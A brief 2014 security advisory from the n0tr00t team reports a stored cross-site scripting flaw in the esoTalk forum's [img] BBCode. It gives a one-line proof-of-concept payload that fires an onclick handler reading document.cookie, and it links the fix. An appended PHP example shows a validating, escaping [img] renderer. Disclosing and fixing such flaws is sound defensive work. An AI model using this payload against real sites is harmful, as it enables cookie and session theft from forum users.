~# n0tr00t Security Team

Esotalk v1.0.0g4: Stored Cross-Site Scripting Caused by [img]

07 Dec 2014 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2014-12-07

0x01 about

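esoTalk is a free, open-source web application from abroad, built on PHP and MySQL, with many advantages. Its design is extremely clean, and it is very fast, ultra-lightweight, and highly extensible.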

Website: [http://esotalk.org/]

Github: [https://github.com/esotalk/esoTalk]

0x02 proof of concept

What is slightly different this time from /2014/11/01/hsdb-0006.html is that the issue is caused by [img]:

[img][url=http://onclick=alert(document.cookie)//.com]http://www.hackersoul.com/image.jpg[/url][/img]

0x03 fix

https://github.com/esotalk/esoTalk/issues/401
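
One way to harden an [img] formatter against input like the proof of concept above, as an added PHP example that is not esoTalk's code and not the fix from the linked issue. The function names safe_image_url and render_img_bbcode are hypothetical, and the two inputs are the PoC string from this page plus a constructed benign tag.

```php
<?php
// Added example: a hypothetical [img] renderer, not esoTalk's own formatter.

// Accept only absolute http(s) URLs that contain no character able to
// close an attribute, open a tag, or start nested BBCode.
function safe_image_url(string $candidate): ?string
{
    $candidate = trim($candidate);
    if ($candidate === '' || preg_match('/[\[\]"\'<>`\s\x00-\x1f]/', $candidate)) {
        return null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $candidate;
}

function render_img_bbcode(string $post): string
{
    // Escape the whole post first so nothing the user typed is live markup.
    $escaped = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return preg_replace_callback(
        '/\[img\](.*?)\[\/img\]/is',
        function (array $m): string {
            // Validate the decoded value, then re-escape it for the attribute.
            $url = safe_image_url(html_entity_decode($m[1], ENT_QUOTES, 'UTF-8'));
            if ($url === null) {
                return $m[0]; // rejected: keep the already-escaped text as text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
}

// The PoC string from this page, and a constructed benign [img] tag.
$poc = '[img][url=http://onclick=alert(document.cookie)//.com]http://www.hackersoul.com/image.jpg[/url][/img]';
$ok  = '[img]http://www.hackersoul.com/image.jpg[/img]';

echo render_img_bbcode($poc), PHP_EOL;
echo render_img_bbcode($ok), PHP_EOL;
```

The same allow-list check belongs in any formatter that runs after this one, so that the rejected text is not turned into markup by a later [url] pass.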